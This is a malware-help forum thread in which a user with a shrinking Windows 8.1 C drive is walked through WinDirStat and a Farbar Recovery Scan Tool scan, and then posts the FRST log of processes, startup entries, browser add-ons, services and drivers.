
Virus Continuously Eating my C Drive


  • This topic is locked
18 replies to this topic

#1 Liljoethemaster

Posted 04 January 2016 - 08:01 PM

Hello there, bleepingcomps. 

I was wondering if you could help me figure out this malware or virus that is eating my C drive, which is continuously slowing down to zero. I'm currently at 833 GB (decreasing atm) to 907 GB on my Windows 8.1 HP laptop's C drive. I have tried every method and used every anti-malware program, including Malwarebytes, SUPERAntiSpyware and every program that offered to take it out, but the problem still remains and it is still decreasing, with no luck taking it out. Disk Cleanup is also having trouble and is not able to fully delete the junk I have in temp and everything I do. I don't know about the WinSxS folder, whether that is the problem or just a random virus or malware is eating my C drive, but I keep attempting and it continuously keeps on going. Please help a brother out. I did every measure and the booting, but I don't know what I'm missing.





#2 thcbytes

  • Malware Response Team

Posted 04 January 2016 - 08:36 PM

Welcome,

 

Please tell me if you have AVG Web TuneUp installed.

 

https://support.avg.com/answers?id=906b00000008svJAAQ

 

Please download, install and run WinDirStat and see where the files are distributed.

 

Regards,

thcbytes


Edited by thcbytes, 04 January 2016 - 09:14 PM.
Correction and clarification

Proud member - Unified Network of Instructors and Trained Eliminators

I do not accept personal donations for assistance provided. I would ask that you instead consider donating the greatest gift - Organ Donation. Your organs are of no use to you when you're gone. You will save a life that would otherwise be lost!

http://donatelife.net/register-now/

#3 Liljoethemaster

  • Topic Starter

Posted 04 January 2016 - 09:38 PM

I installed AVG Secure Search and this is what I got in WinDirStat:



#4 Liljoethemaster

  • Topic Starter

Posted 04 January 2016 - 09:49 PM

[Image: Fx6awfm.png]



#5 thcbytes

  • Malware Response Team

Posted 04 January 2016 - 09:53 PM

Hello again. 

I moved you to a section of the forum where I can obtain more detailed info.

Your hard drive does not look full at all. It's 92% free.

Did you just install AVG Secure Search now? I just wanted to know if you happened to have already installed AVG Web TuneUp previously, as it has been a source of trouble to others with regards to occupying hard drive space.

Please do this.

Download Farbar Recovery Scan Tool for either 32 bit or 64 bit systems and save it to your desktop ---> Important
  • If you are unsure if you have 32 bit or 64 bit, simply download and try one. If that doesn't run properly, the other one should.
  • Double click the icon
  • Click Yes to the disclaimer
  • Make sure the Addition.txt box is checked
  • Click Scan and allow the program to run
  • Click OK on the Scan complete screen, then OK on the Addition.txt pop up screen
  • 2 Notepad documents should now be open on your desktop.
  • Please copy and paste the contents of both in your reply
Regards,
thcbytes

#6 Liljoethemaster

  • Topic Starter

Posted 04 January 2016 - 10:10 PM

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:31-12-2015
Ran by Joseph (administrator) on LILJOETHEMASTER (04-01-2016 20:56:41)
Running from C:\Users\Joseph\Downloads
Loaded Profiles: Joseph (Available Profiles: Joseph)
Platform: Windows 8.1 Connected (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser not detected!)
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(Softex Inc.) C:\Program Files\Hewlett-Packard\SimplePass\OmniServ.exe
(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(SUPERAntiSpyware.com) C:\Program Files\SUPERAntiSpyware\SASCore64.exe
(Andrea Electronics Corporation) C:\Program Files\Realtek\Audio\HDA\AERTSr64.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(BlueStack Systems, Inc.) C:\Program Files (x86)\BlueStacks\HD-UpdaterService.exe
(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
(mst software GmbH, Germany) C:\Program Files (x86)\Ashampoo\Ashampoo WinOptimizer 11\DfSdkS64.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\HP\HP System Event\HPWMISVC.exe
(Intel® Corporation) C:\Program Files\Intel\TXE Components\TCS\HeciServer.exe
() C:\Program Files (x86)\Real\UpdateService\RealPlayerUpdateSvc.exe
(RealNetworks, Inc.) C:\Program Files (x86)\Real\RealPlayer\RPDS\Bin\rpdsvc.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe
() C:\Program Files (x86)\Ashampoo\Ashampoo WinOptimizer 11\LiveTunerService.exe
(Hewlett-Packard) C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBrokerDsktop.exe
(Hewlett-Packard) C:\Program Files\Hewlett-Packard\SimplePass\ClientCore.exe
(Microsoft Corporation) C:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Microsoft Corporation) C:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel Corporation) C:\Windows\System32\igfxHK.exe
(Microsoft Corporation) C:\Windows\System32\GWX\GWX.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(%CFullName%) C:\Program Files\Hewlett-Packard\SimplePass\opvapp.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Ashampoo Development GmbH & Co. KG) C:\Program Files (x86)\Ashampoo\Ashampoo WinOptimizer 11\LiveTuner2.exe
(Hewlett-Packard) C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBroker.exe
(Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
(Microsoft Corporation) C:\Windows\System32\SkyDrive.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MSASCui.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\NisSrv.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MpCmdRun.exe
(RealNetworks, Inc.) C:\Program Files (x86)\Real\RealPlayer\Update\realsched.exe
(Microsoft Corporation) C:\Windows\System32\WWAHost.exe
(Emsisoft GmbH) C:\Program Files (x86)\Emsisoft Anti-Malware\A2SERVICE.EXE.old
(Emsisoft GmbH) C:\Program Files (x86)\Emsisoft Anti-Malware\A2WIZARD.EXE.old
(AVG Secure Search) C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\19.1.0\ToolbarUpdater.exe
() C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\19.1.0\loggingserver.exe
() C:\Program Files (x86)\AVG SafeGuard toolbar\vprot.exe
(Seifert) C:\Program Files (x86)\WinDirStat\windirstat.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe
(AVG Secure Search) C:\Program Files (x86)\Common Files\AVG Secure Search\ScriptHelperInstaller\19.1.0\ScriptHelper.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Users\Joseph\AppData\Local\Temp\mpam-df95902f.exe
(Microsoft Corporation) C:\1d7cd1e922cb58a9eff044172c65\MPSigStub.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
 
 
==================== Registry (Whitelisted) ===========================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [8781568 2015-11-27] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1407744 2015-11-27] (Realtek Semiconductor)
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2818800 2015-02-26] (Synaptics Incorporated)
HKLM\...\Run: [Ashampoo WinOptimizer Live-Tuner2] => C:\Program Files (x86)\Ashampoo\Ashampoo WinOptimizer 11\LiveTuner2.exe [3516808 2014-04-14] (Ashampoo Development GmbH & Co. KG)
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [170256 2015-12-09] (Apple Inc.)
HKLM-x32\...\Run: [BlueStacks Agent] => C:\Program Files (x86)\BlueStacks\HD-Agent.exe [896632 2015-07-22] (BlueStack Systems, Inc.)
HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime\QTTask.exe [421888 2015-06-16] (Apple Inc.)
HKLM-x32\...\Run: [TkBellExe] => c:\program files (x86)\real\realplayer\Update\realsched.exe [286992 2015-11-29] (RealNetworks, Inc.)
HKLM-x32\...\Run: [RealDownloader] => C:\Program Files (x86)\RealNetworks\RealDownloader\downloader2.exe [719632 2015-11-04] ()
HKLM-x32\...\Run: [HPMessageService] => C:\Program Files (x86)\HP\HP System Event\HPMSGSVC.exe [657424 2015-09-03] (Hewlett-Packard Development Company, L.P.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [596528 2015-11-09] (Oracle Corporation)
HKLM-x32\...\Run: [emsisoft anti-malware] => C:\Program Files (x86)\Emsisoft Anti-Malware\a2guard.exe [5836888 2016-01-04] (Emsisoft Ltd)
HKLM-x32\...\Run: [vProt] => C:\Program Files (x86)\AVG SafeGuard toolbar\vprot.exe [2573712 2016-01-04] ()
HKLM-x32\...\RunOnce: [GrpConv] => grpconv -o
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  No File
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\RealTimes.lnk [2015-12-30]
ShortcutTarget: RealTimes.lnk -> C:\Program Files (x86)\Real\RealPlayer\RPDS\Bin\rpsystray.exe (RealNetworks, Inc.)
BootExecute: autocheck autochk * sdnclean64.exe
CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 75.75.75.75 75.75.76.76
Tcpip\..\Interfaces\{61080605-F2B7-444D-81D5-8FBA64FDF543}: [DhcpNameServer] 75.75.75.75 75.75.76.76
 
Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = 
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = 
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = 
HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Local Page = 
HKU\S-1-5-21-1412126346-3748250155-1825200208-1002\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://g.msn.com/HPNOT14/1
HKU\S-1-5-21-1412126346-3748250155-1825200208-1002\Software\Microsoft\Internet Explorer\Main,First Home Page = hxxp://g.msn.com/HPNOT14/1
HKU\S-1-5-21-1412126346-3748250155-1825200208-1002\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://g.msn.com/HPNOT14/1
URLSearchHook: [S-1-5-21-1412126346-3748250155-1825200208-1002] ATTENTION => Default URLSearchHook is missing
SearchScopes: HKLM -> {DDB578EF-F53A-4EF5-8899-5AF9388D9B0A} URL = hxxp://www.amazon.com/s/ref=azs_osd_iea?ie=UTF-8&tag=hp-us2-vsb-20&link%5Fcode=qs&index=aps&field-keywords={searchTerms}
SearchScopes: HKLM-x32 -> DefaultScope value is missing
SearchScopes: HKU\S-1-5-21-1412126346-3748250155-1825200208-1002 -> {DDB578EF-F53A-4EF5-8899-5AF9388D9B0A} URL = hxxp://www.amazon.com/s/ref=azs_osd_iea?ie=UTF-8&tag=hp-us2-vsb-20&link%5Fcode=qs&index=aps&field-keywords={searchTerms}
BHO: RealNetworks Download and Record Plugin for Internet Explorer -> {3049C3E9-B461-4BC5-8870-4C09146192CA} -> C:\Program Files (x86)\RealNetworks\RealDownloader\BrowserPlugins\IE\rndlbrowserrecordplugin64.dll [2015-11-04] (RealDownloader)
BHO: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2015-10-12] (Microsoft Corporation)
BHO-x32: RealNetworks Download and Record Plugin for Internet Explorer -> {3049C3E9-B461-4BC5-8870-4C09146192CA} -> C:\Program Files (x86)\RealNetworks\RealDownloader\BrowserPlugins\IE\rndlbrowserrecordplugin.dll [2015-11-04] (RealDownloader)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_66\bin\ssv.dll [2015-12-28] (Oracle Corporation)
BHO-x32: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2015-10-12] (Microsoft Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_66\bin\jp2ssv.dll [2015-12-28] (Oracle Corporation)
BHO-x32: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll [2015-10-19] (Hewlett-Packard Company)
Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2015-10-12] (Microsoft Corporation)
Handler-x32: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2015-10-12] (Microsoft Corporation)
Handler-x32: viprotocol - {B658800C-F66E-4EF3-AB85-6C0C227862A9} - C:\Program Files (x86)\Common Files\AVG Secure Search\ViProtocolInstaller\19.1.0\ViProtocol.dll [2016-01-04] (AVG Secure Search)
 
FireFox:
========
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_19_0_0_185.dll [2015-09-22] ()
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_19_0_0_185.dll [2015-09-22] ()
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\windows\SysWOW64\Adobe\Director\np32dsw_1204144.dll [2013-09-05] (Adobe Systems, Inc.)
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2015-10-14] ()
FF Plugin-x32: @avg.com/AVG SiteSafety plugin,version=11.0.0.1,application/x-avg-sitesafety-plugin -> C:\Program Files (x86)\Common Files\AVG Secure Search\SiteSafetyInstaller\19.1.0\\npsitesafety.dll [No File]
FF Plugin-x32: @java.com/DTPlugin,version=11.66.2 -> C:\Program Files (x86)\Java\jre1.8.0_66\bin\dtplugin\npDeployJava1.dll [2015-12-28] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.66.2 -> C:\Program Files (x86)\Java\jre1.8.0_66\bin\plugin2\npjp2.dll [2015-12-28] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3508.0205 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2013-02-05] (Microsoft Corporation)
FF Plugin-x32: @nexon.net/NxGame -> C:\ProgramData\NexonUS\NGM\npNxGameUS.dll [No File]
FF Plugin-x32: @real.com/nppl3260;version=18.1.2.175 -> c:\program files (x86)\real\realplayer\Netscape6\nppl3260.dll [2015-11-29] (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprpplugin;version=18.1.2.175 -> c:\program files (x86)\real\realplayer\Netscape6\nprpplugin.dll [2015-11-29] (RealPlayer)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [2015-12-03] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [2015-12-03] (Google Inc.)
FF Extension: Skype Click to Call - C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A}.xpi [2015-10-08]
FF HKLM-x32\...\Firefox\Extensions: [firefox@bho.com] - C:\Program Files\Hewlett-Packard\SimplePass\FFBHOExt
FF Extension: No Name - C:\Program Files\Hewlett-Packard\SimplePass\FFBHOExt [2016-01-04] [not signed]
FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\4EE9D714CCDF205C798D6ABB8B1239644EE9 [2015-11-19] <==== ATTENTION
 
Chrome: 
=======
CHR Profile: C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Drive) - C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-01-04]
CHR Extension: (YouTube) - C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-01-04]
CHR Extension: (Google Search) - C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2016-01-04]
CHR Extension: (Google Docs Offline) - C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-01-04]
CHR Extension: (AVG Secure Search) - C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default\Extensions\ndibdjnfmopecpmkdieinmbadjfpblof [2016-01-04]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-01-04]
CHR Extension: (Gmail) - C:\Users\Joseph\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-01-04]
CHR HKLM-x32\...\Chrome\Extension: [fidikogfgleiaefnjbmnjaplmgknppkg] - hxxps://clients2.google.com/service/update2/crx
 
==================== Services (Whitelisted) ========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 !SASCORE; C:\Program Files\SUPERAntiSpyware\SASCORE64.EXE [172344 2014-07-22] (SUPERAntiSpyware.com)
R2 a2AntiMalware; C:\Program Files (x86)\Emsisoft Anti-Malware\a2service.exe [7084784 2016-01-04] (Emsisoft Ltd)
R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [77104 2015-10-07] (Apple Inc.)
S3 BstHdAndroidSvc; C:\Program Files (x86)\BlueStacks\HD-Service.exe [433784 2015-06-16] (BlueStack Systems, Inc.)
S3 BstHdLogRotatorSvc; C:\Program Files (x86)\BlueStacks\HD-LogRotatorService.exe [413304 2015-06-16] (BlueStack Systems, Inc.)
R2 BstHdUpdaterSvc; C:\Program Files (x86)\BlueStacks\HD-UpdaterService.exe [831096 2015-07-21] (BlueStack Systems, Inc.)
R2 c2cautoupdatesvc; C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1433216 2015-10-12] (Microsoft Corporation)
R2 c2cpnrsvc; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1773696 2015-10-12] (Microsoft Corporation)
R2 DfSdkS; C:\Program Files (x86)\Ashampoo\Ashampoo WinOptimizer 11\DfsdkS64.exe [544768 2009-08-24] (mst software GmbH, Germany) [File not signed]
R2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [25800 2015-09-28] (Hewlett-Packard Company)
R2 HPWMISVC; C:\Program Files (x86)\HP\HP System Event\HPWMISVC.exe [606224 2015-09-03] (Hewlett-Packard Development Company, L.P.)
R2 igfxCUIService1.0.0.0; C:\Windows\system32\igfxCUIService.exe [318568 2015-02-26] (Intel Corporation)
R2 Intel® Capability Licensing Service Interface; C:\Program Files\Intel\TXE Components\TCS\HeciServer.exe [733696 2013-07-01] (Intel® Corporation) [File not signed]
S3 Intel® Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\TXE Components\TCS\SocketHeciServer.exe [822232 2013-07-01] (Intel® Corporation)
S4 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1513784 2015-10-05] (Malwarebytes)
S2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [1135416 2015-10-05] (Malwarebytes)
R2 omniserv; C:\Program Files\Hewlett-Packard\SimplePass\OmniServ.exe [124928 2015-07-02] (Softex Inc.) [File not signed]
R2 RealPlayerUpdateSvc; C:\Program Files (x86)\Real\UpdateService\RealPlayerUpdateSvc.exe [33088 2015-11-04] ()
R2 RealTimes Desktop Service; c:\program files (x86)\real\realplayer\RPDS\Bin\rpdsvc.exe [1095976 2015-11-29] (RealNetworks, Inc.)
R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [307456 2015-11-27] (Realtek Semiconductor)
R2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [191728 2015-02-26] (Synaptics Incorporated)
R2 vToolbarUpdater19.1.0; C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\19.1.0\ToolbarUpdater.exe [1864592 2016-01-04] (AVG Secure Search)
R3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [366552 2015-07-07] (Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23824 2015-07-07] (Microsoft Corporation)
R2 WO_LiveService2; C:\Program Files (x86)\Ashampoo\Ashampoo WinOptimizer 11\LiveTunerService.exe [223624 2014-04-14] ()
 
===================== Drivers (Whitelisted) ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 BstHdDrv; C:\Program Files (x86)\BlueStacks\HD-Hypervisor-amd64.sys [145528 2015-06-16] (BlueStack Systems)
R1 CLVirtualDrive; C:\Windows\system32\DRIVERS\CLVirtualDrive.sys [100624 2015-06-08] (CyberLink)
S0 ebdrv; C:\Windows\System32\drivers\evbda.sys [3357024 2013-08-22] (Broadcom Corporation)
S3 ElgatoGC658Y; C:\Windows\System32\Drivers\ElgatoGC658.sys [52456 2014-11-13] (UB658)
R1 epp64; C:\Windows\System32\DRIVERS\epp64.sys [135800 2015-03-24] (Emsisoft GmbH)
R3 GPIO; C:\Windows\System32\drivers\iaiogpioe.sys [31232 2013-11-11] (Intel Corporation)
R3 int0800; C:\Windows\System32\drivers\flashud.sys [51712 2009-03-06] (Intel Corporation)
R2 LiveTuner2PM; C:\Program Files (x86)\Ashampoo\Ashampoo WinOptimizer 11\LiveTuner64.sys [14320 2014-03-20] ()
R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25816 2015-10-05] (Malwarebytes)
S3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [192216 2016-01-04] (Malwarebytes)
S3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [64216 2015-10-05] (Malwarebytes Corporation)
R0 MBI; C:\Windows\System32\drivers\MBI.sys [29464 2014-01-23] (Intel Corporation)
R3 netr28x; C:\Windows\system32\DRIVERS\netr28x.sys [2432656 2014-08-12] (MediaTek Inc.)
R3 RSP2STOR; C:\Windows\system32\DRIVERS\RtsP2Stor.sys [294104 2015-02-26] (Realtek Semiconductor Corp.)
R3 rtbth; C:\Windows\System32\drivers\rtbth.sys [1205872 2015-02-26] (Ralink Technology, Corp.)
R1 SASDIFSV; C:\Program Files\SUPERAntiSpyware\SASDIFSV64.SYS [14928 2011-07-22] (SUPERAdBlocker.com and SUPERAntiSpyware.com)
R1 SASKUTIL; C:\Program Files\SUPERAntiSpyware\SASKUTIL64.SYS [12368 2011-07-12] (SUPERAdBlocker.com and SUPERAntiSpyware.com)
S3 SmbDrv; C:\Windows\System32\drivers\Smb_driver_AMDASF.sys [29936 2013-12-12] (Synaptics Incorporated)
R3 SmbDrvI; C:\Windows\system32\DRIVERS\Smb_driver_Intel.sys [33960 2015-09-08] (Synaptics Incorporated)
R3 TXEIx64; C:\Windows\System32\drivers\TXEIx64.sys [88592 2014-01-15] (Intel Corporation)
S0 WdBoot; C:\Windows\System32\drivers\WdBoot.sys [44560 2015-07-07] (Microsoft Corporation)
R0 WdFilter; C:\Windows\System32\drivers\WdFilter.sys [270168 2015-07-07] (Microsoft Corporation)
R2 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [114520 2015-07-07] (Microsoft Corporation)
R3 WirelessButtonDriver; C:\Windows\System32\drivers\WirelessButtonDriver64.sys [30384 2015-06-23] (HP Inc.)
R3 XSplit_Dummy; C:\Windows\system32\drivers\xspltspk.sys [26200 2014-07-02] (SplitmediaLabs Limited)
S3 EagleX64; \??\C:\Windows\system32\drivers\EagleX64.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2016-01-04 20:56 - 2016-01-04 20:59 - 00021951 _____ C:\Users\Joseph\Downloads\FRST.txt
2016-01-04 20:56 - 2016-01-04 20:56 - 00000000 ____D C:\FRST
2016-01-04 20:54 - 2016-01-04 20:55 - 02370560 _____ (Farbar) C:\Users\Joseph\Downloads\FRST64.exe
2016-01-04 20:12 - 2016-01-04 20:12 - 00000000 ____D C:\1d7cd1e922cb58a9eff044172c65
2016-01-04 20:00 - 2016-01-04 20:00 - 00001014 _____ C:\Users\Joseph\Desktop\WinDirStat.lnk
2016-01-04 20:00 - 2016-01-04 20:00 - 00000000 ____D C:\Users\Joseph\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinDirStat
2016-01-04 20:00 - 2016-01-04 20:00 - 00000000 ____D C:\Users\Joseph\AppData\Local\AVG SafeGuard toolbar
2016-01-04 20:00 - 2016-01-04 20:00 - 00000000 ____D C:\ProgramData\AVG Secure Search
2016-01-04 20:00 - 2016-01-04 20:00 - 00000000 ____D C:\Program Files (x86)\WinDirStat
2016-01-04 19:59 - 2016-01-04 20:00 - 00000000 ____D C:\Users\Joseph\AppData\LocalLow\AVG SafeGuard toolbar
2016-01-04 19:59 - 2016-01-04 20:00 - 00000000 ____D C:\ProgramData\AVG SafeGuard toolbar
2016-01-04 19:59 - 2016-01-04 19:59 - 00645729 _____ (WDS Team) C:\Users\Joseph\Downloads\windirstat1_1_2_setup.exe
2016-01-04 19:59 - 2016-01-04 19:59 - 00000000 ____D C:\Program Files (x86)\AVG SafeGuard toolbar
2016-01-04 19:56 - 2016-01-04 19:57 - 00207640 _____ C:\Users\Joseph\Downloads\AVG Secure Search.exe
2016-01-04 18:56 - 2016-01-04 18:56 - 00001074 _____ C:\Users\Public\Desktop\Emsisoft Anti-Malware.lnk
2016-01-04 18:56 - 2016-01-04 18:56 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Emsisoft Anti-Malware
2016-01-04 18:55 - 2015-03-24 00:17 - 00135800 _____ (Emsisoft GmbH) C:\Windows\system32\Drivers\epp64.sys
2016-01-04 18:54 - 2016-01-04 19:59 - 00000000 ____D C:\Program Files (x86)\Emsisoft Anti-Malware
2016-01-04 18:42 - 2016-01-04 18:43 - 159508608 _____ (Emsisoft Ltd. ) C:\Users\Joseph\Downloads\EmsisoftAntiMalwareSetup.exe
2016-01-04 18:06 - 2016-01-04 18:06 - 00000000 ____D C:\Users\Joseph\AppData\Local\GWX
2016-01-04 17:30 - 2016-01-04 17:30 - 00000000 ____D C:\Users\Joseph\AppData\Roaming\Apple Computer
2016-01-04 17:30 - 2016-01-04 17:30 - 00000000 ____D C:\Users\Joseph\AppData\LocalLow\Apple Computer
2016-01-04 17:30 - 2016-01-04 17:30 - 00000000 ____D C:\Users\Joseph\AppData\Local\MediaShow
2016-01-04 17:29 - 2016-01-04 17:30 - 00000000 ____D C:\Users\Joseph\AppData\Roaming\CyberLink
2016-01-04 17:29 - 2016-01-04 17:29 - 00000000 ____D C:\Users\Joseph\Documents\CyberLink
2016-01-04 17:29 - 2016-01-04 17:29 - 00000000 ____D C:\Users\Joseph\AppData\Local\CyberLink
